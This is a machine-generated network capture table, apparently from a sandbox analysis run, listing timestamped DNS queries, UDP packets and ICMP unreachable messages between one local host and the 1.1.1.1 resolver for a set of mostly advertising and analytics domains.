                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.118482113 CET53542051.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.181214094 CET6551953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.181355953 CET6310253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.183393955 CET6334353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.183530092 CET6162553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.274859905 CET53631021.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.276372910 CET53655191.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.434492111 CET5815953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.434657097 CET5646053192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.438810110 CET5761953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.439095974 CET5033753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.439547062 CET5900653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.439698935 CET6483453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.443077087 CET53564601.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.443114996 CET53581591.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.446818113 CET53648341.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.446963072 CET53590061.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.446993113 CET53576191.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.447910070 CET53503371.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.688951969 CET5463753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.689356089 CET5686553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.697459936 CET53546371.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.698065996 CET53568651.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.720202923 CET6357653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.720642090 CET6218053192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.727618933 CET53635761.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.728295088 CET53621801.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.016087055 CET6426653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.016087055 CET5727753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.023258924 CET53642661.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.024421930 CET53572771.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.251940966 CET5217653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.251940966 CET6180153192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.259061098 CET53521761.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.259074926 CET53618011.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.538569927 CET6367453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.538805962 CET6374553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.545734882 CET53636741.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.545777082 CET53637451.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.586992025 CET6325553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.587153912 CET6066753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.595474005 CET53606671.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.147665024 CET5999853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.147826910 CET5997653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.154795885 CET53599761.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.156439066 CET53599981.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.000610113 CET6532053192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.000766039 CET5428553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.009500980 CET53653201.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.010296106 CET53542851.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.725660086 CET4976453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.725779057 CET5425753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.733283043 CET53497641.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.733350039 CET53542571.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:23.993839979 CET5073653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:23.994791031 CET5833253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.003150940 CET53583321.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.113799095 CET6185053192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.113954067 CET5128353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.121236086 CET53512831.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.367132902 CET4931653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.374250889 CET53493161.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:32.027688026 CET53562671.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:45.726120949 CET5155953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:45.733755112 CET53515591.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:53.335628986 CET53597601.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:56.354823112 CET53565871.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.226182938 CET5390453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.226361990 CET6285853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.233498096 CET53628581.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.235136986 CET53539041.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:07.129084110 CET138138192.168.2.17192.168.2.255
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.220377922 CET5944253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.220571041 CET6211453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.238677025 CET53594421.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.242728949 CET53621141.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.602591038 CET5129753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.602849960 CET6025153192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.610207081 CET53602511.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.626107931 CET53512971.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:19.826196909 CET6147553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:19.826328993 CET5175653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:21.011850119 CET5804153192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:21.011987925 CET6354753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:22.113467932 CET53638741.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:26.012783051 CET5101853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:26.012980938 CET5124253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:26.240856886 CET53512421.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.224436045 CET192.168.2.171.1.1.1c237(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.948009014 CET192.168.2.171.1.1.1c229(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.035871029 CET192.168.2.171.1.1.1c262(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.428670883 CET192.168.2.171.1.1.10x9e0bStandard query (0)r.neurotags.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.428847075 CET192.168.2.171.1.1.10x5ccStandard query (0)r.neurotags.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.404319048 CET192.168.2.171.1.1.10x8449Standard query (0)sepedatua.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.404319048 CET192.168.2.171.1.1.10x8df8Standard query (0)sepedatua.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.165375948 CET192.168.2.171.1.1.10xd82bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.165601969 CET192.168.2.171.1.1.10x2d77Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.645173073 CET192.168.2.171.1.1.10xf5f0Standard query (0)mazans.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.645427942 CET192.168.2.171.1.1.10xe799Standard query (0)mazans.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.319380999 CET192.168.2.171.1.1.10xbb76Standard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.319560051 CET192.168.2.171.1.1.10x90b3Standard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.337538958 CET192.168.2.171.1.1.10xf5a8Standard query (0)cdn.segment.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.337678909 CET192.168.2.171.1.1.10x860eStandard query (0)cdn.segment.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.338211060 CET192.168.2.171.1.1.10xb0b8Standard query (0)rum.hlx.pageA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.338362932 CET192.168.2.171.1.1.10xfa79Standard query (0)rum.hlx.page65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.106856108 CET192.168.2.171.1.1.10xcc24Standard query (0)rum.hlx.pageA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.106996059 CET192.168.2.171.1.1.10x2bc8Standard query (0)rum.hlx.page65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.810400009 CET192.168.2.171.1.1.10xf089Standard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.810568094 CET192.168.2.171.1.1.10x9005Standard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.856405020 CET192.168.2.171.1.1.10x3d1fStandard query (0)twilio.tt.omtrdc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.856564999 CET192.168.2.171.1.1.10xcca1Standard query (0)twilio.tt.omtrdc.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.861032009 CET192.168.2.171.1.1.10xa237Standard query (0)j.6sc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.861488104 CET192.168.2.171.1.1.10x2318Standard query (0)j.6sc.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.106508970 CET192.168.2.171.1.1.10x1494Standard query (0)cdn.segment.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.106899023 CET192.168.2.171.1.1.10xae6cStandard query (0)cdn.segment.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.014821053 CET192.168.2.171.1.1.10xeac4Standard query (0)twilio.tt.omtrdc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.014985085 CET192.168.2.171.1.1.10x37b9Standard query (0)twilio.tt.omtrdc.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.015656948 CET192.168.2.171.1.1.10xdbb3Standard query (0)j.6sc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.015866995 CET192.168.2.171.1.1.10x201aStandard query (0)j.6sc.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.192941904 CET192.168.2.171.1.1.10x162Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.193125010 CET192.168.2.171.1.1.10xe2f3Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.263899088 CET192.168.2.171.1.1.10x7b94Standard query (0)euob.powerrobotflower.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.264043093 CET192.168.2.171.1.1.10x8018Standard query (0)euob.powerrobotflower.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.264448881 CET192.168.2.171.1.1.10xe9dStandard query (0)consent.trustarc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.264632940 CET192.168.2.171.1.1.10xbf41Standard query (0)consent.trustarc.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.265002966 CET192.168.2.171.1.1.10xe5e9Standard query (0)snap.licdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.265444040 CET192.168.2.171.1.1.10x7d96Standard query (0)munchkin.marketo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.265444040 CET192.168.2.171.1.1.10xd975Standard query (0)snap.licdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.265851974 CET192.168.2.171.1.1.10xe42cStandard query (0)munchkin.marketo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.355619907 CET192.168.2.171.1.1.10xd985Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.355789900 CET192.168.2.171.1.1.10x2e70Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.362545967 CET192.168.2.171.1.1.10xbb5eStandard query (0)secure.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.362938881 CET192.168.2.171.1.1.10x9eaeStandard query (0)secure.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.363282919 CET192.168.2.171.1.1.10x576aStandard query (0)c.6sc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.363467932 CET192.168.2.171.1.1.10x8a7dStandard query (0)c.6sc.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.363955021 CET192.168.2.171.1.1.10x1278Standard query (0)ipv6.6sc.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.363955021 CET192.168.2.171.1.1.10x7240Standard query (0)ipv6.6sc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.386812925 CET192.168.2.171.1.1.10xdb49Standard query (0)munchkin.marketo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.386812925 CET192.168.2.171.1.1.10x733Standard query (0)munchkin.marketo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.571336985 CET192.168.2.171.1.1.10xf337Standard query (0)b.6sc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.571337938 CET192.168.2.171.1.1.10xabd5Standard query (0)b.6sc.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.575752974 CET192.168.2.171.1.1.10x2763Standard query (0)consent.trustarc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.575752974 CET192.168.2.171.1.1.10x4e41Standard query (0)consent.trustarc.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.642869949 CET192.168.2.171.1.1.10x4cfaStandard query (0)a.quora.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.643018007 CET192.168.2.171.1.1.10x9241Standard query (0)a.quora.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.643456936 CET192.168.2.171.1.1.10x4c78Standard query (0)snap.licdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.643547058 CET192.168.2.171.1.1.10x24e0Standard query (0)snap.licdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.647058010 CET192.168.2.171.1.1.10xf7a0Standard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.647244930 CET192.168.2.171.1.1.10x48d1Standard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.308866024 CET192.168.2.171.1.1.10x7caaStandard query (0)cdn.heapanalytics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.309040070 CET192.168.2.171.1.1.10x9099Standard query (0)cdn.heapanalytics.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.315442085 CET192.168.2.171.1.1.10x3343Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.315699100 CET192.168.2.171.1.1.10x8e02Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.323065042 CET192.168.2.171.1.1.10x5bc6Standard query (0)euob.powerrobotflower.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.323667049 CET192.168.2.171.1.1.10x33eeStandard query (0)euob.powerrobotflower.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.495224953 CET192.168.2.171.1.1.10x2ba6Standard query (0)secure.quantserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.495435953 CET192.168.2.171.1.1.10x2b41Standard query (0)secure.quantserve.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.509042025 CET192.168.2.171.1.1.10xc6feStandard query (0)c.6sc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.509196997 CET192.168.2.171.1.1.10x98f7Standard query (0)c.6sc.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.558469057 CET192.168.2.171.1.1.10xd8d4Standard query (0)ipv6.6sc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.558661938 CET192.168.2.171.1.1.10xd408Standard query (0)ipv6.6sc.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.659977913 CET192.168.2.171.1.1.10xec86Standard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.660154104 CET192.168.2.171.1.1.10x925dStandard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.684154034 CET192.168.2.171.1.1.10x41e7Standard query (0)secure.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.684154034 CET192.168.2.171.1.1.10x5b52Standard query (0)secure.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.771857023 CET192.168.2.171.1.1.10x2e14Standard query (0)jscloud.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.771940947 CET192.168.2.171.1.1.10xe65bStandard query (0)jscloud.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.773720980 CET192.168.2.171.1.1.10x7ad7Standard query (0)b.6sc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.773853064 CET192.168.2.171.1.1.10x7272Standard query (0)b.6sc.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.796546936 CET192.168.2.171.1.1.10x333bStandard query (0)www.redditstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.796546936 CET192.168.2.171.1.1.10x2e44Standard query (0)www.redditstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.836523056 CET192.168.2.171.1.1.10xef53Standard query (0)q.quora.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.837162018 CET192.168.2.171.1.1.10x8830Standard query (0)q.quora.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.530327082 CET192.168.2.171.1.1.10x92ecStandard query (0)www.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.530664921 CET192.168.2.171.1.1.10x5f08Standard query (0)www.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.538664103 CET192.168.2.171.1.1.10x7e50Standard query (0)www.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.547856092 CET192.168.2.171.1.1.10x5ea2Standard query (0)obseu.powerrobotflower.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.548098087 CET192.168.2.171.1.1.10x1230Standard query (0)obseu.powerrobotflower.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621176004 CET192.168.2.171.1.1.10x683fStandard query (0)jscloud.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621340990 CET192.168.2.171.1.1.10x581Standard query (0)jscloud.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.625338078 CET192.168.2.171.1.1.10x56d2Standard query (0)www.redditstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.625515938 CET192.168.2.171.1.1.10x1b7eStandard query (0)www.redditstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.629683971 CET192.168.2.171.1.1.10x8962Standard query (0)pixel-config.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.629975080 CET192.168.2.171.1.1.10x35f9Standard query (0)pixel-config.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.656941891 CET192.168.2.171.1.1.10x5305Standard query (0)q.quora.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.657103062 CET192.168.2.171.1.1.10xc970Standard query (0)q.quora.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.959814072 CET192.168.2.171.1.1.10xc230Standard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.959942102 CET192.168.2.171.1.1.10xf939Standard query (0)td.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.975090027 CET192.168.2.171.1.1.10x3a88Standard query (0)alb.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.975388050 CET192.168.2.171.1.1.10x683dStandard query (0)alb.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.975600958 CET192.168.2.171.1.1.10x3484Standard query (0)cdn.heapanalytics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.975753069 CET192.168.2.171.1.1.10xd2ebStandard query (0)cdn.heapanalytics.com65IN (0x0001)false
